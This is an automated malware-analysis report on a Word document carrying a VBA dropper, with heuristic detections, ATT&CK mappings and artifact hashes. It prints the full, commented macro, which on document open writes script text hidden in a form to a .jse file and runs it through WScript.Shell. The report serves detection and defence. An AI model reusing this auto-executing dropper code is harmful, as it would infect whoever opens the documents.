Verdict: MALICIOUS
Risk Score: 352

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is an OOXML document containing VBA macros, specifically an AutoOpen macro that utilizes WScript.Shell and CreateObject to execute arbitrary code. This strongly suggests the document is designed to download and execute a secondary payload, as indicated by the 'Doc.Malware.Sdrop-7011816-0' ClamAV detection. The VBA code is heavily obfuscated, making precise analysis of the payload difficult, but the intent to execute external code is clear.
Heuristics (10)

- ClamAV: Doc.Malware.Sdrop-7011816-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sdrop-7011816-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project; VBA macros present (project part renamed away from vbaProject.bin: word/vbaProjectSignature.bin)
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): Matched line in script: `W8rsDmcH = "Set R0KFKDAL = New T0MqioX End Sub " Set WshScript = CreateObject("WScript.Shell") G4pnLfWmw42 = 931534755`
- VBA project part renamed to evade filename detection (high, OOXML_VBA_PROJECT_RENAMED): The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
- CreateObject call (high, OLE_VBA_CREATEOBJ): Matched line in script: `W8rsDmcH = "Set R0KFKDAL = New T0MqioX End Sub " Set WshScript = CreateObject("WScript.Shell") G4pnLfWmw42 = 931534755`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): Matched line in script: `Attribute VB_Name = "NewMacros" Sub autoopen()`
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- VBA project carries a recognised code-signing signature (info, VBA_SIGNED_TRUSTED): The VBA project is Authenticode-signed and the signer/issuer chain matches a recognised code-signing publisher or CA. Informational only: the signature is NOT yet verified to cover the current project bytes, so it does not (yet) reduce the verdict.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document (all labelled "In document text (OOXML body / shared strings)"). The URL itself is not a detection; the per-URL labels indicate which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection / triage |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3459 bytes | c4968ef34b220f96d55d1a5e348a41fecf063a1ca18a9b68c2bbfe0f02189aca | |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 694272 bytes | 320de3e4ffabbc7778e0200a5a4d6a8dec12a319b003c37a7dd8a18c6f2f7ddd | ClamAV: Doc.Malware.Sdrop-7011816-0; obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building tokens) |
| vbaProject_01.bin | vba-project | OOXML VBA project: word/vbaProjectSignature.bin | 5997 bytes | 487c3652be66efa7d720b1eaa941a9da86537e5afe61810e49c94a9cbc735d79 | |

Preview of macros.bas (first 1,000 lines of the extracted script; analyst comments added to mark the operative lines, the rest is verbatim):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
' Entry point: autoopen -> Test2 -> a1
Sub autoopen()
Test2
End Sub
Sub Test()
Dim MyDate As Date
MyDate = DateValue("6/1/72") + TimeValue("10:10:12")
MsgBox str(Minute(MyDate))
MsgBox str(Year(MyDate))
End Sub
Sub SimpleCalculator()
Dim strExpr As String
strExpr = InputBox("Что будем считать?")
MsgBox strExpr & " = " & Application.Evaluate(strExpr)
End Sub
' a1 is the dropper. The numeric assignments, unused Dims and string literals
' holding VBA fragments are never used; they are padding for obfuscation.
Sub a1()
x5sEBneTxZaP = "For Each I2ThnZ In L0sgrB "
Set C1 = ActiveDocument
Dim B8TzTpJwUG1
D3uLeRIaW = " E4UJBPSm = v2UEZMM & Trim(U9KVJ.A9ciTot()) For Each g3ltlAER In Z8UlJ "
Set B2 = UserForm1
Dim e8mZUfpZAr3
b6yFXmglEFDw = " c2XRTE = x5IOauG & Trim(L3NxuKCL.r5TbiMn()) "
' Drop directory: the folder of the document's attached template
pathTemplate = C1.AttachedTemplate.Path
I4mclRxP = "For Each w0xgTRe In r1lcHgv Set W2MAGNm = Nothing While Not R5tzve.T9tPfc "
Set B3 = B2.TextBox1
d0snHwXJqnuf6 = 692486631
w6dCtOXErBF = "Function I9QdNLJ(E2tmtJ, x0ARt While Not N8dnaC.N5AmTKz Sub S3xbGBU "
z9JFgxtcq = " B2vzbgPr = z3grFE & Trim(z9cySEa.x2cTgHNh()) End Function "
' The script body lives in UserForm1.TextBox1, not in the macro source
jsText = B3.Text
V2HdLyNzONG9 = 890606048
n8bIUfZgL10 = 619597862
G2EqzGDhTeX = "For Each e6KgtB In F4Atr Function p1TTqp(N0qEl, H8XNsX "
Dim g9WQyAkkN12
K1DsTTOmku = "End Function Sub G6vZQBc "
v6bzUvXaZ = "For Each p5QFko In t6SOAqIT "
a3ksybBC = "Sub H8kqxB Private Sub Class A2EXDGLU "
k9ezQaxKT16 = 434199213
Dim r5vSSaqggHP17
Dim v2PspbhCkrlO18
T5emVNTkDG19 = 355952764
Dim f3bZEcft20
t4vVJXUIZUXp21 = 982879734
Randomize
w3mhxosNLRMZ22 = 500268623
A8rxfaTbLuU23 = 512059155
g4WfdpfMhNU24 = 714177401
Dim H1wriGXc25
K3ToGIAxyFp26 = 239192917
Dim U6pTvntgVN27
Dim a7iRpkCnPSwX28
H4pBSqepQlff29 = 501306310
G1MyyJXnlkpr30 = 820750225
P3rhSaXydl = "Private Sub Class h8cnDsa For Each M0urhy In q5ZIcXOT End Function "
' Random-named .jse file in the template directory (Chr(92) is a backslash)
file2save = pathTemplate & Chr(92) & Rnd & ".jse"
O8iEJCzEedT32 = 698289702
q4GkrfPdaya33 = 218294975
' Write the TextBox1 contents to disk
Open file2save For Output As #94
J4cOBadKkGV = "Private Sub Class W0NoWMN Set J7kZa = New z8LvVnWX Set n1luq = Nothing "
Print #94, jsText
l6DJwqdiNeE = "Sub z4DeSWI "
Close #94
n5WitzUwUK36 = 328472828
Dim h1UEuPkrvR37
Dim V7sMsqqVSI38
Dim c1RerPVuVJOF39
Dim B5zzgHRkL40
W8rsDmcH = "Set R0KFKDAL = New T0MqioX End Sub "
' Execute the dropped file through WScript.Shell (the OLE_VBA_WSCRIPT / OLE_VBA_CREATEOBJ hits)
Set WshScript = CreateObject("WScript.Shell")
G4pnLfWmw42 = 931534755
D = WshScript.Run(file2save, 4, False)
p4taXRxsxDv43 = 270082398
Z5tygTapdhtR44 = 459927670
Dim Q6mbOMhKH45
End Sub
Sub Test2()
a1
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E1773B78-4AEB-4C8C-8494-C780CC74A129}{14431844-187F-41F3-A283-9163D0D33B50}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```